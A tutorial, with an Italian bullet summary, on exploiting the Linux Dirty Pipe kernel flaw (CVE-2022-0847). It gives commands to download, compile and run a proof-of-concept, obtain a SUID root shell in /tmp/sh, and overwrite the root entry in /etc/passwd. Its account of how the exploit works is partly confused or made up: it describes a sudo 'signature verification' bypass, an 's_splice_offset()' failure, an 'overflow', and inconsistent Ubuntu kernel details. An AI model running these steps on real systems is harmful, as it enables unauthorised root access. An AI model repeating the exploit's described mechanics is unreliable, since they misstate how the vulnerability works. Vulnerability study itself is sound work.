- La vulnerabilità Dirty Pipe (CVE-2022-0847) permette di sovrascrivere file in sola lettura.
- Introdotta nel kernel Linux 5.8, corretta nelle versioni 5.16.11, 5.15.25 e 5.10.102.
- L'exploit può modificare
/etc/passwdo/usr/bin/sudoper ottenere privilegi di root.
In this tutorial, we will get our hands dirty trying to exploit the Dirty Pipe vulnerability (CVE-2022-0847). This vulnerability was discovered by Max Kellermann, and he also provided a proof-of-concept (PoC) exploit in a blog post.
The Dirty Pipe vulnerability allows overwriting data in arbitrary read-only files. This can be used to escalate privileges by modifying sensitive files like /etc/passwd. This vulnerability was introduced in Linux Kernel version 5.8 and fixed in versions 5.16.11, 5.15.25, and 5.10.102.
Proof of concept
We will use a Linux virtual machine with Ubuntu 5.15.0-25-generic. The easiest way to get a vulnerable system is to download an Ubuntu 21.10 (Impish Indri) image. If you already have a newer version, you can just downgrade your kernel version. You can check your kernel version by running:
uname -rIn our case, we will use the PoC provided by the discoverer of the vulnerability. You can find it here.
First, we need to download it into our vulnerable virtual machine:
wget https://dirtypipe.cm4all.com/dirtypipe-exploit.cThen, compile it:
gcc -Wall dirtypipe-exploit.c -o dirtypipe-exploitIf you get an error similar to fatal error: openssl/sha.h: No such file or directory, you need to install libssl-dev:
sudo apt update
sudo apt install libssl-devOnce compiled, we can run it. By default, it will overwrite /usr/bin/sudo and change the root password to “pipe”. So we have to be careful when running it:
./dirtypipe-exploitAfter running it, it will create a SUID shell named /tmp/sh. You can run it and you will have a root shell:
/tmp/sh
whoamiAs you can see, we immediately got a root shell:
Now, let’s explain how the exploit works!
The Exploit
The exploit has three modes: /etc/passwd, /usr/bin/sudo and custom.
/etc/passwd
The /etc/passwd file has all the system user accounts. Each line in the /etc/passwd file represents a user account, and it is divided into seven colon-separated fields:
- Username
- Password (encrypted)
- User ID (UID)
- Group ID (GID)
- User ID Info (GECOS)
- Home directory
- Login shell
When the exploit is run in this mode, it tries to inject a new user with UID 0 (root) and GID 0 (root) into /etc/passwd.
The interesting part is how this mode bypasses some of the exploit’s limitations. To successfully exploit Dirty Pipe, an offset and a string to inject at that offset are needed.
By default, /etc/passwd has several lines, and the exploit injects a new line. But if the file is large enough, s_splice_offset() can fail because of a memory allocation issue. To bypass this, it leverages the newline character, as the overflow starts writing data from the beginning of the next line. So, the exploit injects a newline and the crafted user at the end of a line; the overflow writes at the beginning of the next one, which is the crafted user.
/usr/bin/sudo
The /usr/bin/sudo file is a SUID-root binary that allows users to run commands as root. The exploit overwrites the string "Usage: %s -h" with "AAAAAA%s -h". This change on its own doesn’t seem to be very useful, but it bypasses a signature verification check. After that, it generates a SUID shell in /tmp/sh.
Custom
This mode allows the user to specify a custom offset and string to inject. For example:
./dirtypipe-exploit /etc/passwd 0 'root::0:0: root:/root:/bin/sh'This command can overwrite the entire definition of the root user.
Conclusion
The Dirty Pipe vulnerability is a serious privilege escalation vulnerability that affects a wide range of Linux systems. The exploit is reliable and easy to use, making it a significant threat to systems that have not yet been patched.
It’s important to update your kernel to a patched version (5.16.11, 5.15.25, or 5.10.102 or newer) to protect against this vulnerability.
By
